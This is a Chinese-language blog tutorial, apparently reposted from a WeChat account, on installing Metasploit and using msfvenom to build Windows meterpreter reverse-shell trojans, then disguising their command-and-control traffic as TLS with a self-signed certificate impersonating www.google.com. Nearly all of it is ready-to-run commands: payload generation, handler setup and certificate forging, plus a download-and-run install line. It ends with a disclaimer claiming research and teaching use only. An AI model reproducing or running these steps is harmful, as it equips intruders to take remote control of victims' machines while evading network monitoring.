一、Ubuntu上安装MSF
安装链接:https://www.cnblogs.com/tomyyyyy/p/12813299.html
0x01 官方脚本
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
0x02 安装postgresql数据库
sudo apt install postgresql
0x03 查看postgresql数据库状态
sudo service postgresql status
0x04 启动MSF
msfconsole
0x05 初始化数据库
msfdb init
0x06 更新MSF
sudo msfupdate
二、MSF明文流量
0x01 生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.143 LPORT=1234 -f exe > shell.exe
0x02 进行监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
options
set lhost 192.168.20.143
set lport 1234
run
0x03 成功上线
0x04 在受害主机上查看流量
这种TCP的数据包很容易被捕捉到然后发现与MSF进行通信。
三、MSF流量加密
0x01 创建证书
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com"
-keyout www.google.com.key
-out www.google.com.crt &&
cat www.google.com.key www.google.com.crt > www.google.com.pem &&
rm -f www.google.com.key www.google.com.crt
0x02 生成木马
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.20.143 LPORT=4433 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o shell.exe
0x03 进行监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_winhttps
options
set lhost 192.168.20.143
set lport 1234
set HandlerSSLCert /root/www.google.com.pem
set StagerVerifySSLCert true
0x04 成功上线
0x05 在受害主机上查看流量
可以看到都变成了TLS的加密流量。
原文始发于微信公众号(想走安全的小白):MSF进行流量加密
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论